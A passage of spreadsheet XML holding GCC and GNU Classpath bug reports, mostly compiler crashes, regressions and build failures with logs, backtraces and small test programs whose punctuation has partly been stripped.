  </si>
  <si>
    <t>[5 Regression] Invalid mnemonic 'xxlxor' on powerpc-apple-darwin9 with -m64</t>
  </si>
  <si>
    <t>Between revisions r213754 (no error) and r214053 I get the following failures on powerpc-apple-darwin9 with -m64:
Running target unix/-m64
FAIL: gcc.c-torture/compile/920501-15.c   -O1  (test for excess errors)
FAIL: gcc.c-torture/compile/920501-15.c   -O2  (test for excess errors)
FAIL: gcc.c-torture/compile/920501-15.c   -O3 -fomit-frame-pointer  (test for excess errors)
FAIL: gcc.c-torture/compile/920501-15.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/compile/920501-15.c   -Os  (test for excess errors)
FAIL: gcc.c-torture/compile/920501-15.c   -O2 -flto -flto-partition=none  (test for excess errors)
FAIL: gcc.c-torture/compile/920501-15.c   -O2 -flto  (test for excess errors)
FAIL: gcc.c-torture/compile/920928-2.c   -O1  (test for excess errors)
FAIL: gcc.c-torture/compile/920928-2.c   -O2  (test for excess errors)
FAIL: gcc.c-torture/compile/920928-2.c   -O3 -fomit-frame-pointer  (test for excess errors)
FAIL: gcc.c-torture/compile/920928-2.c   -O3 -fomit-frame-pointer -funroll-loops  (test for excess errors)
FAIL: gcc.c-torture/compile/920928-2.c   -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/compile/920928-2.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/compile/920928-2.c   -Os  (test for excess errors)
FAIL: gcc.c-torture/compile/920928-2.c   -O2 -flto -flto-partition=none  (test for excess errors)
FAIL: gcc.c-torture/compile/920928-2.c   -O2 -flto  (test for excess errors)
FAIL: gcc.c-torture/compile/pr34091.c   -O1  (test for excess errors)
FAIL: gcc.c-torture/compile/pr34091.c   -O2  (test for excess errors)
FAIL: gcc.c-torture/compile/pr34091.c   -O3 -fomit-frame-pointer  (test for excess errors)
FAIL: gcc.c-torture/compile/pr34091.c   -O3 -fomit-frame-pointer -funroll-loops  (test for excess errors)
FAIL: gcc.c-torture/compile/pr34091.c   -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  (test for excess errors)
FAIL: gcc.c-torture/compile/pr34091.c   -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/compile/pr34091.c   -Os  (test for excess errors)
FAIL: gcc.c-torture/compile/pr34091.c   -O2 -flto -flto-partition=none  (test for excess errors)
FAIL: gcc.c-torture/compile/pr34091.c   -O2 -flto  (test for excess errors)
The errors are of the kind
/var/tmp//ccPo810U.s:8:Invalid mnemonic 'xxlxor'
and require -On and -m64 with n&gt;0.</t>
  </si>
  <si>
    <t>GCC-82217</t>
  </si>
  <si>
    <t>ICE on valid code at -O1 and above: in visit_phi at tree-ssa-sccvn.c:3908</t>
  </si>
  <si>
    <t>This should be a very recent regression. 
$ gcctk -v
Using built-in specs.
COLLECT_GCC=gcctk
COLLECT_LTO_WRAPPER=/home/su/software/tmp/gcc/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/8.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/home/su/software/tmp/gcc/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 8.0.0 20170915 (experimental) [trunk revision 252779] (GCC)
$
$ gcctk -O0 small.c
$ gcc-7.2.0 -O1 small.c
$
$ gcctk -O1 small.c
during GIMPLE pass: fre
small.c: In function â€˜fn1â€™:
small.c:29:1: internal compiler error: in visit_phi at tree-ssa-sccvn.c:3908
 }
 ^
0xe4d420 visit_phi
        ../../gcc-source-trunk/gcc/tree-ssa-sccvn.c:3908
0xe4d420 visit_use
        ../../gcc-source-trunk/gcc/tree-ssa-sccvn.c:3982
0xe4dfd3 process_scc
        ../../gcc-source-trunk/gcc/tree-ssa-sccvn.c:4330
0xe4dfd3 extract_and_process_scc_for_name
        ../../gcc-source-trunk/gcc/tree-ssa-sccvn.c:4401
0xe4dfd3 DFS
        ../../gcc-source-trunk/gcc/tree-ssa-sccvn.c:4451
0xe4ee33 sccvn_dom_walker::before_dom_children(basic_block_def*)
        ../../gcc-source-trunk/gcc/tree-ssa-sccvn.c:4900
0x1379a2a dom_walker::walk(basic_block_def*)
        ../../gcc-source-trunk/gcc/domwalk.c:291
0xe4fe25 run_scc_vn(vn_lookup_kind)
        ../../gcc-source-trunk/gcc/tree-ssa-sccvn.c:5016
0xe1ae62 execute
        ../../gcc-source-trunk/gcc/tree-ssa-pre.c:5157
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
----------------------------------
int a b c
void fn1 ()
{ 
  while (1)
    { 
      if (c)
        goto L2
      break
    }
  if (c)
    {
    L1:{
        int g[1]
        if (b)
          goto L1
        goto L1
      L2:
        for (a = 0 a)
          goto L1
      }
    }
}
int main ()
{ 
  fn1 ()
  return 0
}</t>
  </si>
  <si>
    <t>GCC-233</t>
  </si>
  <si>
    <t>loop unrolling generates duplicate assmebler labels -&gt; gas rejects code</t>
  </si>
  <si>
    <t>While compiling memtest86 with
gcc -c -Wall -O2 -march=i686 -funroll-loops test.c
I get Fatal Error Symbol L9 already defined.
There seem to be a function that is inlined and then 
included multiple times because of unrolling. But the 
compiler generates the local label f only once.
Regards
Ingo Oeser
Release:
gcc version 2.95.2 19991024 (release)
Environment:
i586-redhat-linux
How-To-Repeat:
Download http://reality.sgi.com/cbrady/memtest86/memtest86-2.3.tar.gz
change the included makefile to unroll loops and join the fun.</t>
  </si>
  <si>
    <t>ingo.oeser</t>
  </si>
  <si>
    <t>GCC-55225</t>
  </si>
  <si>
    <t>libquadmath</t>
  </si>
  <si>
    <t>Fail to build lgammaq.c from trunk with mingw-w64</t>
  </si>
  <si>
    <t>Mingw-w64 doesn't have declared signgam in  that leads to an error:
depbase=`echo math/lgammaq.lo | sed 's|[^/]*$|.deps/s|\.lo$||'`\
	/bin/sh ./libtool --tag=CC   --mode=compile /temp/x64-trunk-snapshot-posix-seh-rev0/build/gcc-trunk/./gcc/xgcc -B/temp/x64-trunk-snapshot-posix-seh-rev0/build/gcc-trunk/./gcc/ -L/temp/x64-trunk-snapshot-posix-seh-rev0/prefix/x86_64-w64-mingw32/lib -L/temp/x64-trunk-snapshot-posix-seh-rev0/prefix/mingw/lib -isystem /temp/x64-trunk-snapshot-posix-seh-rev0/prefix/x86_64-w64-mingw32/include -isystem /temp/x64-trunk-snapshot-posix-seh-rev0/prefix/mingw/include -B/temp/x64-trunk-snapshot-posix-seh-rev0/prefix/x86_64-w64-mingw32/bin/ -B/temp/x64-trunk-snapshot-posix-seh-rev0/prefix/x86_64-w64-mingw32/lib/ -isystem /temp/x64-trunk-snapshot-posix-seh-rev0/prefix/x86_64-w64-mingw32/include -isystem /temp/x64-trunk-snapshot-posix-seh-rev0/prefix/x86_64-w64-mingw32/sys-include    -DHAVE_CONFIG_H -I. -I../../../../../mingw-sources/gcc-trunk/libquadmath     -g -O2 -pipe -fomit-frame-pointer -I/temp/x64-trunk-snapshot-posix-seh-rev0/libs/include -I/temp/mingw-prereq/x86_64-w64-mingw32-static/include -MT math/lgammaq.lo -MD -MP -MF $depbase.Tpo -c -o math/lgammaq.lo ../../../../../mingw-sources/gcc-trunk/libquadmath/math/lgammaq.c &amp;&amp;\
	mv -f $depbase.Tpo $depbase.Plo
libtool: compile:  /temp/x64-trunk-snapshot-posix-seh-rev0/build/gcc-trunk/./gcc/xgcc -B/temp/x64-trunk-snapshot-posix-seh-rev0/build/gcc-trunk/./gcc/ -L/temp/x64-trunk-snapshot-posix-seh-rev0/prefix/x86_64-w64-mingw32/lib -L/temp/x64-trunk-snapshot-posix-seh-rev0/prefix/mingw/lib -isystem /temp/x64-trunk-snapshot-posix-seh-rev0/prefix/x86_64-w64-mingw32/include -isystem /temp/x64-trunk-snapshot-posix-seh-rev0/prefix/mingw/include -B/temp/x64-trunk-snapshot-posix-seh-rev0/prefix/x86_64-w64-mingw32/bin/ -B/temp/x64-trunk-snapshot-posix-seh-rev0/prefix/x86_64-w64-mingw32/lib/ -isystem /temp/x64-trunk-snapshot-posix-seh-rev0/prefix/x86_64-w64-mingw32/include -isystem /temp/x64-trunk-snapshot-posix-seh-rev0/prefix/x86_64-w64-mingw32/sys-include -DHAVE_CONFIG_H -I. -I../../../../../mingw-sources/gcc-trunk/libquadmath -g -O2 -pipe -fomit-frame-pointer -I/temp/x64-trunk-snapshot-posix-seh-rev0/libs/include -I/temp/mingw-prereq/x86_64-w64-mingw32-static/include -MT math/lgammaq.lo -MD -MP -MF math/.deps/lgammaq.Tpo -c ../../../../../mingw-sources/gcc-trunk/libquadmath/math/lgammaq.c  -DDLL_EXPORT -DPIC -o math/.libs/lgammaq.o
../../../../../mingw-sources/gcc-trunk/libquadmath/math/lgammaq.c: In function 'lgammaq':
../../../../../mingw-sources/gcc-trunk/libquadmath/math/lgammaq.c:763:3: error: 'signgam' undeclared (first use in this function)
   signgam = 1
   ^
../../../../../mingw-sources/gcc-trunk/libquadmath/math/lgammaq.c:763:3: note: each undeclared identifier is reported only once for each function it appears in
make[3]: *** [math/lgammaq.lo] Error 1
make[3]: Leaving directory `/temp/x64-trunk-snapshot-posix-seh-rev0/build/gcc-trunk/x86_64-w64-mingw32/libquadmath'</t>
  </si>
  <si>
    <t>alexpux</t>
  </si>
  <si>
    <t>GCC-23774</t>
  </si>
  <si>
    <t>dealloc of dynamic stack space breaks backchain</t>
  </si>
  <si>
    <t>The following compiled with -m32 -O2 -S
void badFunc (int size)
{ 
  char temp[size]
  temp[size-1] = '\0'
}
gives
badFunc:
        mflr 0
        stwu 1-16(1)
        stw 020(1)
        addi 0330
        lwz 90(1)
        mr 111
        stw 3112(1)
        mr 311
        rlwinm 000027
        neg 00
        stwux 910
        li 90
        addi 0123
        rlwinm 000027
        add 330
        stb 9-1(3)      &lt;- old backchain possibly overwritten
        nop
        nop
        nop
        lwz 00(1)
        mr 111          &lt;- adjust stack backchain possibly invalid!
        stw 00(1)       &lt;- write backchain
        nop
        lwz 110(1)
        lwz 04(11)
        lwz 31-4(11)
        mr 111
        mtlr 0
        blr
This testcase also shows
a) excess allocation of dynamic stack space
b) needless alignment of dynamic stack space
c) poor epilogue code with unnecesary stack adjustments.</t>
  </si>
  <si>
    <t>CLASSPATH-16121</t>
  </si>
  <si>
    <t>gtk based awt peers: cast from pointer to integer of different size</t>
  </si>
  <si>
    <t>CVS HEAD 20040620:
/bin/sh ./libtool --mode=compile
/build/buildd/gcc-snapshot-20040620/build/gcc/xgcc
-B/build/buildd/gcc-snapshot-20040620/build/gcc/
-B/usr/lib/gcc-snapshot/alpha-linux-gnu/bin/
-B/usr/lib/gcc-snapshot/alpha-linux-gnu/lib/ -isystem
/usr/lib/gcc-snapshot/alpha-linux-gnu/include -isystem
/usr/lib/gcc-snapshot/alpha-linux-gnu/sys-include -DHAVE_CONFIG_H -I.
-I../../../src/libjava -I./include -I./gcj -I../../../src/libjava -Iinclude
-I../../../src/libjava/include
-I/build/buildd/gcc-snapshot-20040620/src/boehm-gc/include -DPACKAGE_NAME=
-DPACKAGE_TARNAME= -DPACKAGE_VERSION= -DPACKAGE_STRING=
-DPACKAGE_BUGREPORT= -DGC_LINUX_THREADS=1 -D_REENTRANT=1
-DTHREAD_LOCAL_ALLOC=1 -DSTDC_HEADERS=1 -DHAVE_SYS_TYPES_H=1 -DHAVE_SYS_STAT_H=1
-DHAVE_STDLIB_H=1 -DHAVE_STRING_H=1 -DHAVE_MEMORY_H=1 -DHAVE_STRINGS_H=1
-DHAVE_INTTYPES_H=1 -DHAVE_STDINT_H=1 -DHAVE_UNISTD_H=1 -DSILENT=1
-DNO_SIGNALS=1 -DALL_INTERIOR_POINTERS=1 -DJAVA_FINALIZATION=1
-DGC_GCJ_SUPPORT=1 -DATOMIC_UNCOLLECTABLE=1   -I../../../src/libjava/libltdl
-I../../../src/libjava/libltdl  -I../../../src/libjava/.././libjava/../gcc 
-I../../../src/libjava/../libffi/include -I../libffi/include  -O2 -g -O2  -mieee
-mieee -Wextra -Wall -O2 -g -O2  -mieee -c -Ijniinclude
-I../../../src/libjava/jni/classpath -I../../../src/libjava/jni/gtk-peer \
-ansi -pedantic -Wall -Wno-long-long -DXTHREADS -I/usr/include/gtk-2.0
-I/usr/lib/gtk-2.0/include -I/usr/X11R6/include -I/usr/include/atk-1.0
-I/usr/include/pango-1.0 -I/usr/include/freetype2 -I/usr/include/glib-2.0
-I/usr/lib/glib-2.0/include   -I/usr/include/libart-2.0   \
  -o jni/gtk-peer/gthread-jni.lo ../../../src/libjava/jni/gtk-peer/gthread-jni.c
/build/buildd/gcc-snapshot-20040620/build/gcc/xgcc
-B/build/buildd/gcc-snapshot-20040620/build/gcc/
-B/usr/lib/gcc-snapshot/alpha-linux-gnu/bin/
-B/usr/lib/gcc-snapshot/alpha-linux-gnu/lib/ -isystem
/usr/lib/gcc-snapshot/alpha-linux-gnu/include -isystem
/usr/lib/gcc-snapshot/alpha-linux-gnu/sys-include -DHAVE_CONFIG_H -I.
-I../../../src/libjava -I./include -I./gcj -I../../../src/libjava -Iinclude
-I../../../src/libjava/include
-I/build/buildd/gcc-snapshot-20040620/src/boehm-gc/include -DPACKAGE_NAME=
-DPACKAGE_TARNAME= -DPACKAGE_VERSION= -DPACKAGE_STRING= -DPACKAGE_BUGREPORT=
-DGC_LINUX_THREADS=1 -D_REENTRANT=1 -DTHREAD_LOCAL_ALLOC=1 -DSTDC_HEADERS=1
-DHAVE_SYS_TYPES_H=1 -DHAVE_SYS_STAT_H=1 -DHAVE_STDLIB_H=1 -DHAVE_STRING_H=1
-DHAVE_MEMORY_H=1 -DHAVE_STRINGS_H=1 -DHAVE_INTTYPES_H=1 -DHAVE_STDINT_H=1
-DHAVE_UNISTD_H=1 -DSILENT=1 -DNO_SIGNALS=1 -DALL_INTERIOR_POINTERS=1
-DJAVA_FINALIZATION=1 -DGC_GCJ_SUPPORT=1 -DATOMIC_UNCOLLECTABLE=1
-I../../../src/libjava/libltdl -I../../../src/libjava/libltdl
-I../../../src/libjava/.././libjava/../gcc
-I../../../src/libjava/../libffi/include -I../libffi/include -O2 -g -O2 -mieee
-mieee -Wextra -Wall -O2 -g -O2 -mieee -c -Ijniinclude
-I../../../src/libjava/jni/classpath -I../../../src/libjava/jni/gtk-peer -ansi
-pedantic -Wall -Wno-long-long -DXTHREADS -I/usr/include/gtk-2.0
-I/usr/lib/gtk-2.0/include -I/usr/X11R6/include -I/usr/include/atk-1.0
-I/usr/include/pango-1.0 -I/usr/include/freetype2 -I/usr/include/glib-2.0
-I/usr/lib/glib-2.0/include -I/usr/include/libart-2.0
../../../src/libjava/jni/gtk-peer/gthread-jni.c  -fPIC -DPIC -o
jni/gtk-peer/.libs/gthread-jni.o
../../../src/libjava/jni/gtk-peer/gthread-jni.c: In function `maybe_rethrow':
../../../src/libjava/jni/gtk-peer/gthread-jni.c:110: warning: implicit
declaration of function 'bzero'
../../../src/libjava/jni/gtk-peer/gthread-jni.c: In function `allocatePlainObject':
../../../src/libjava/jni/gtk-peer/gthread-jni.c:149: warning: dereferencing
type-punned pointer will break strict-aliasing rules
../../../src/libjava/jni/gtk-peer/gthread-jni.c: In function `freePlainObject':
../../../src/libjava/jni/gtk-peer/gthread-jni.c:172: warning: dereferencing
type-punned pointer will break strict-aliasing rules
../../../src/libjava/jni/gtk-peer/gthread-jni.c: In function
`g_mutex_lock_jni_impl':
../../../src/libjava/jni/gtk-peer/gthread-jni.c:207: warning: dereferencing
type-punned pointer will break strict-aliasing rules
../../../src/libjava/jni/gtk-peer/gthread-jni.c: In function
`g_mutex_unlock_jni_impl':
../../../src/libjava/jni/gtk-peer/gthread-jni.c:227: warning: dereferencing
type-punned pointer will break strict-aliasing rules
../../../src/libjava/jni/gtk-peer/gthread-jni.c: In function
`g_cond_signal_jni_impl':
../../../src/libjava/jni/gtk-peer/gthread-jni.c:256: warning: dereferencing
type-punned pointer will break strict-aliasing rules
../../../src/libjava/jni/gtk-peer/gthread-jni.c: In function
`g_cond_broadcast_jni_impl':
../../../src/libjava/jni/gtk-peer/gthread-jni.c:281: warning: dereferencing
type-punned pointer will break strict-aliasing rules
../../../src/libjava/jni/gtk-peer/gthread-jni.c: In function `g_cond_wait_jni_impl':
../../../src/libjava/jni/gtk-peer/gthread-jni.c:309: warning: dereferencing
type-punned pointer will break strict-aliasing rules
../../../src/libjava/jni/gtk-peer/gthread-jni.c: In function
`g_cond_timed_wait_jni_impl':
../../../src/libjava/jni/gtk-peer/gthread-jni.c:342: warning: dereferencing
type-punned pointer will break strict-aliasing rules
../../../src/libjava/jni/gtk-peer/gthread-jni.c: In function
`g_private_new_jni_impl':
../../../src/libjava/jni/gtk-peer/gthread-jni.c:394: warning: dereferencing
type-punned pointer will break strict-aliasing rules
../../../src/libjava/jni/gtk-peer/gthread-jni.c: In function
`g_private_get_jni_impl':
../../../src/libjava/jni/gtk-peer/gthread-jni.c:424: warning: dereferencing
type-punned pointer will break strict-aliasing rules
../../../src/libjava/jni/gtk-peer/gthread-jni.c:444: warning: cast to pointer
from integer of different size
../../../src/libjava/jni/gtk-peer/gthread-jni.c: In function
`g_private_set_jni_impl':
../../../src/libjava/jni/gtk-peer/gthread-jni.c:456: warning: dereferencing
type-punned pointer will break strict-aliasing rules
../../../src/libjava/jni/gtk-peer/gthread-jni.c:464: warning: cast from pointer
to integer of different size</t>
  </si>
  <si>
    <t>GCC-1304</t>
  </si>
  <si>
    <t>GCJ fails to compile inner classes which extend another inner class</t>
  </si>
  <si>
    <t xml:space="preserve">From: Mark Wielaard 
To: idstewart@softhome.net
Cc: java-gnats@sourceware.cygnus.com
Subject: Re: gcj/283: GCJ fails to compile inner classes which extend another inner class
Date: Fri 14 Jul 2000 14:11:31 +0200
 Hi
 You might want to try the patch attached to gcj/256
 That solves the problem for me.
 Note that in your example you try to extend InnerB from a non static
 innerclass InnerA which is not legal. Making InnerA a public static class
 would be a valid example.
 Mark
</t>
  </si>
  <si>
    <t>idstewart</t>
  </si>
  <si>
    <t>GCC-82674</t>
  </si>
  <si>
    <t>ICE with -fstack-clash-protection</t>
  </si>
  <si>
    <t>Following ICEs:
$ ./xgcc -B. /home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/tree-ssa/pr23848-1.c --param stack-clash-protection-probe-interval=16 -fstack-clash-protection
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/tree-ssa/pr23848-1.c: In function â€˜foo1â€™:
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/tree-ssa/pr23848-1.c:12:1: error: unrecognizable insn:
 }
 ^
(insn 39 69 40 5 (parallel [
            (set (mem:DI (plus:DI (reg/f:DI 1 1)
                        (const_int -65536 [0xffffffffffff0000])) [0  S8 A8])
                (reg:DI 144))
            (set (reg/f:DI 1 1)
                (plus:DI (reg/f:DI 1 1)
                    (const_int -65536 [0xffffffffffff0000])))
        ]) /home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/tree-ssa/pr23848-1.c:9 -1
     (nil))
during RTL pass: vregs
/home/marxin/Programming/gcc/gcc/testsuite/gcc.dg/tree-ssa/pr23848-1.c:12:1: internal compiler error: in extract_insn at recog.c:2305
0xe90dbd _fatal_insn(char const* rtx_def const* char const* int char const*)
	../../gcc/rtl-error.c:108
0xe90dfe _fatal_insn_not_found(rtx_def const* char const* int char const*)
	../../gcc/rtl-error.c:116
0xe3a661 extract_insn(rtx_insn*)
	../../gcc/recog.c:2305
0xb2fcac instantiate_virtual_regs_in_insn
	../../gcc/function.c:1639
0xb31172 instantiate_virtual_regs
	../../gcc/function.c:1959
0xb3123c execute
	../../gcc/function.c:2008</t>
  </si>
  <si>
    <t>GCC-57222</t>
  </si>
  <si>
    <t>[4.8/4.9 Regression] Template alias not working in argument of template class template method</t>
  </si>
  <si>
    <t>When I declare a template method of a template class whose argument type is specified by a template alias I get a compile error. With version 4.7.3 it compiles. If I change the template class to a class it compiles. If I replace the template alias by the actual type (here Templ) it compiles.
Code:
template  class Templ&gt;
using Bool = Templ
template 
class Foo {
private:
public:
    template class Templ&gt;
    void method(Bool boolTempl)
}
template 
template  class Templ&gt;
void Foo::method(Bool boolTempl) {
}
int main() {
    Foo foo
    return 0
}
Compiler Output:
g++ templTest12.C -o templTest12 -std=c++11
templTest12.C: In substitution of `template class Templ&gt; using Bool = Templ [with Templ = Templ]':
templTest12.C:17:6:   required from `class Foo'
templTest12.C:30:12:   required from here
templTest12.C:2:25: error: `template class Templ' is not a template
 using Bool = Templ
Compiler Specs:
g++ -v
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/gcc/x86_64-linux-gnu/4.8/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu/Linaro 4.8.0-2ubuntu2~12.04.2' --with-bugurl=file:///usr/share/doc/gcc-4.8/README.Bugs --enable-languages=cc++go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enable-plugin --with-system-zlib --enable-objc-gc --enable-multiarch --disable-werror --with-arch-32=i686 --with-abi=m64 --with-multilib-list=m32m64 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.8.0 (Ubuntu/Linaro 4.8.0-2ubuntu2~12.04.2)
System Info:
uname -a
Linux ip-10-245-218-142 3.2.0-39-virtual #62-Ubuntu SMP Thu Feb 28 00:48:27 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux</t>
  </si>
  <si>
    <t>florian.conrady</t>
  </si>
  <si>
    <t>GCC-14576</t>
  </si>
  <si>
    <t>[3.4/3.5? Regression] ICE in libiberty when building gcc-3.4 for arm-elf</t>
  </si>
  <si>
    <t>Please forgive me if this is a dup of 14166 14302 14558 or anything else. I 
don't think it is... 
When building a cross-compiler with gcc-3.4 snapshots (I only have 20040303 
and 20040310) there is an ICE when compiling at -O3. The ICE does not occur 
at -O2 nor does it happen in gcc-3.3.3 release. 
I have a symlink to the newlib (1.12.0) directory in the gcc source base 
directory. build directory is also in the gcc source base directory. Build 
compiler is gcc-3.3.3. 
Command line is: 
CFLAGS=-O3 -pipe ../configure --prefix=/usr --target=arm-elf 
--enable-languages=cc++ --with-newlib --disable-multilib --with-gnu-ld 
--with-gnu-as &amp;&amp; make 
Relevant output is: 
/home/rfbrown/build/gcc-3.4-20040310/build/gcc/xgcc 
-B/home/rfbrown/build/gcc-3.4-20040310/build/gcc/ -nostdinc 
-B/home/rfbrown/build/gcc-3.4-20040310/build/arm-elf/newlib/ 
-isystem /home/rfbrown/build/gcc-3.4-20040310/build/arm-elf/newlib/targ-include 
-isystem /home/rfbrown/build/gcc-3.4-20040310/newlib/libc/include 
-B/usr/arm-elf/bin/ -B/usr/arm-elf/lib/ -isystem /usr/arm-elf/include 
-isystem /usr/arm-elf/sys-include -c -DHAVE_CONFIG_H -O2 -O3 -pipe -I. 
-I../../../libiberty/../include  -W -Wall -Wtraditional 
-pedantic ../../../libiberty/cp-demangle.c -o cp-demangle.o 
../../../libiberty/cp-demangle.c: In function `d_print_comp': 
../../../libiberty/cp-demangle.c:3438: error: insn does not satisfy its 
constraints: 
(insn:HI 4207 13052 13051 279 ../../../libiberty/cp-demangle.c:3191 (set 
(mem/s:SI (post_modify:SI (reg:SI 1 r1) 
                (plus:SI (reg:SI 1 r1) 
                    (const_int 16 [0x10]))) [55 .next+0 S4 A32]) 
        (reg:SI 2 r2)) 125 {*arm_movsi_insn} (insn_list:REG_DEP_ANTI 4160 
(insn_list:REG_DEP_ANTI 4155 (insn_list:REG_DEP_OUTPUT 4199 
(insn_list:REG_DEP_ANTI 4198 (nil))))) 
    (expr_list:REG_DEAD (reg:SI 2 r2) 
        (expr_list:REG_INC (reg:SI 1 r1) 
            (nil)))) 
../../../libiberty/cp-demangle.c:3438: internal compiler error: in 
copyprop_hardreg_forward_1 at regrename.c:1549 
Please submit a full bug report 
with preprocessed source if appropriate. 
Attachment is preprocessed source for just the d_print_comp function let me 
know if you want the whole file. 
linux binutils here is 2.14.90.0.8 (from sources.redhat.com). arm-elf binutils 
is 2.14 (vanilla gnu).</t>
  </si>
  <si>
    <t>GCC-10378</t>
  </si>
  <si>
    <t>[library DR 402] cannot add object with inplace new into STL collections</t>
  </si>
  <si>
    <t>The following chunk of code doesn't compile - there seems to be a problem with adding objects that define a simple inplace new operator to STL collection classes. Note that the code WILL compile if the second new operator if defined instead of the first one. I first came across this when recompiling some code that uses IBM's ICU Unicode library as their UnicodeString class now defines an inplace new &amp; delete operator in the base class. This means i can't add UnicodeString objects to an STL list without amending the original ICU library.
Release:
3.0.4
Environment:
Linux (Debian testing)
How-To-Repeat:
Just compile.</t>
  </si>
  <si>
    <t>nick.brook</t>
  </si>
  <si>
    <t>GCC-61254</t>
  </si>
  <si>
    <t>gccgo: spurious error: slice end must be integer [GoSmith]</t>
  </si>
  <si>
    <t>gcc version 4.10.0 20140516 (experimental) (GCC) 
The program is:
package main
func main() {
	((([][]int{})[:])[0])[0]++
}
$ go build -compiler=gccgo /tmp/index.go
src.go:4:15: error: slice end must be integer
  ((([][]int{})[:])[0])[0]++
gc compiles successfully.</t>
  </si>
  <si>
    <t>GCC-48490</t>
  </si>
  <si>
    <t>delete with template convertion operator does overload resolution for class operands but shouldn't.</t>
  </si>
  <si>
    <t>GCC accepts following code. But it should be reject.
---- testcase.C ----
struct S
{
	template 
	operator T *() { return 0 }
}
int main()
{
	S s
	delete s
}
----
All of following versions accept it.
Ubuntu/Linaro 4.4.4-14ubuntu5
4.5.2
4.5.3 20110217
4.6.0
4.6.1 20110310
4.7.0 20110405</t>
  </si>
  <si>
    <t>GCC-78953</t>
  </si>
  <si>
    <t>Errors in compiling Spec 2006 for power9</t>
  </si>
  <si>
    <t>Two of the spec 2006 benchmarks (gamess and calculix) get errors when compiled by recent trunk compilers with -mcpu=power9:
Error in gamess:
Error: insn does not satisfy its constraints:
(insn 8520 8519 8521 96 (parallel [
            (set (reg:SI 4 4 [4221])
                (vec_select:SI (reg:V4SI 43 11 [orig:586 vect__86.1681 ] [586])
                    (parallel [
                            (const_int 1 [0x1])
                        ])))
            (clobber (reg:SI 29 29 [4222]))
        ]) loccd.fppized.f:379 1184 {vsx_extract_v4si_p9}
     (expr_list:REG_UNUSED (reg:SI 29 29 [4222])
        (nil)))
loccd.fppized.f:564:0: internal compiler error: in extract_constrain_insn at recog.c:2213
Error in calculix:
SPOOLES/MSMD/src/MSMD_init.c: In function 'MSMD_init':
SPOOLES/MSMD/src/MSMD_init.c:161:1: error: insn does not satisfy its constraints:
 return  }
 ^~~~~~
(insn 2674 2673 2675 37 (parallel [
            (set (reg:SI 0 0 [985])
                (vec_select:SI (reg:V4SI 32 0 [orig:378 vect__50.42 ] [378])
                    (parallel [
                            (const_int 1 [0x1])
                        ])))
            (clobber (reg:SI 31 31 [986]))
        ]) SPOOLES/MSMD/src/MSMD_init.c:113 1184 {vsx_extract_v4si_p9}
     (expr_list:REG_UNUSED (reg:SI 31 31 [986])
        (nil)))</t>
  </si>
  <si>
    <t>GCC-46990</t>
  </si>
  <si>
    <t>[OOP] gfortran rejects passing a CLASS variable to TYPE</t>
  </si>
  <si>
    <t>In the following program a polymorphic dummy is passed as actual argument to a non-polymorphic dummy of the declared type.
The program compiles with the ifort 11.1 and nagf95 5.1 but gfortran rejects it with:
    call two(x)
             1
Error: Type mismatch in argument 'x' at (1) passed CLASS(t) to TYPE(t)
Both compiler reject passing a CLASS(t2) variable to TYPE(t) or CLASS(t) to TYPE(t2). (Where t2 extends type t.)
 * * *
From the standard.
The dummy argument shall be type compatible with the actual argument. If the actual argument is a polymorphic coindexed object the dummy argument shall not be polymorphic. (F2008 12.5.2.4)
A nonpolymorphic entity is type compatible only with entities of the same declared type. (4.3.1.3)
Thus the dummy argument (a nonpolymorphic entitiy) is type compatible with entities (i.e. actual actual arguments) of the same declared type.
 * * *
module m
  type t
    integer :: i
  end type t
contains
  subroutine one(x)
    class(t) :: x
    call two(x)
  end subroutine one
  subroutine two(x)
    type(t) :: x
  end subroutine two
end module m</t>
  </si>
  <si>
    <t>GCC-17395</t>
  </si>
  <si>
    <t>[4.5 Regression] Incorrect lookup for parameters</t>
  </si>
  <si>
    <t>G++ is confused about the scope of function paramaters.  
Here is a testcase
    template struct X { }
    void fu(int a X) { }         // #1
    template
    void bhar(T a X) { }          // #2
    int main()
    {
       int x
       X y
       fu(x y)                             // #3
       bhar(x y)                           // #4
    }
g++ erroneously rejects #1 and #2.
Notice that Comeau online accepts everything except #3 -- but
it should have accepted it.</t>
  </si>
  <si>
    <t>GCC-48834</t>
  </si>
  <si>
    <t>[4.7 Regression] -fno-exceptions causes wrong code generation on C++ code</t>
  </si>
  <si>
    <t>Created attachment 24150
reduced testcase
Compiler flags:
$ g++ testcase.C -fno-exceptions
Output (simplified):
$ g++ testcase.C -fno-exceptions -Wall -W -g
testcase.C: In function 'int main()':
testcase.C:6:4: warning: unused variable 's' [-Wunused-variable]
testcase.C:6:15: warning: 's' is used uninitialized in this function [-Wuninitialized]
$ valgrind -q ./a.out 
==17173== Use of uninitialised value of size 8
==17173==    at 0x40060C: S::S() (testcase.C:2)
==17173==    by 0x4005DE: main (testcase.C:6)
==17173== 
==17173== 
==17173== Process terminating with default action of signal 11 (SIGSEGV)
==17173==  Bad permissions for mapped region at address 0x4004D0
==17173==    at 0x40060C: S::S() (testcase.C:2)
==17173==    by 0x4005DE: main (testcase.C:6)
Segmentation fault
This seems to be a recent regression.
Tested revisions:
r173182 - fail
4.6 r173059 - OK</t>
  </si>
  <si>
    <t>GCC-79339</t>
  </si>
  <si>
    <t>[7 Regression] Memory leak in gimple-ssa-sprintf.c</t>
  </si>
  <si>
